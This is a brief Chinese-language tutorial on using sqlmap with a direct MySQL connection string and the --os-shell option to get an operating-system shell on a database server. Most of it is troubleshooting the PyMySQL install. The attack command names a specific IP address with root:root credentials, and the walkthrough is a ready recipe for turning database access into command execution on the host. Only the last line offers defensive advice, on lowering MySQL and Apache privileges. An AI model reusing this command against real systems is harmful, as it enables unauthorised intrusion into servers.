前提是在数据库用户可以外联的情况下
python2 sqlmap.py -d "mysql://root:root@119.90.126.9:3306/dedecms" --os-shell 直接执行这一句
"数据库类型://数据库账户:密码@ip:端口/数据库名称" -d是sqlmap中连接数据库的参数
当爆出这个错误时说明pymysql这个库没有安装
去https://github.com/PyMySQL/PyMySQL下载后,放入python安装目录lib中,cmd执行python2 setup.py install
如果出现这个错误
https://bootstrap.pypa.io/ez_setup.py 复制保存为ez_setup.py文件放入lib文件夹中,执行python2 ez_setup.py
然后再重新python2 setup.py install ,就可以了
我们再在sqlmap中试一下,成功,记得选64,选32有时不行,两个版本都试试啦
所以我们在降权时mysql和apache都要降权,才更加安全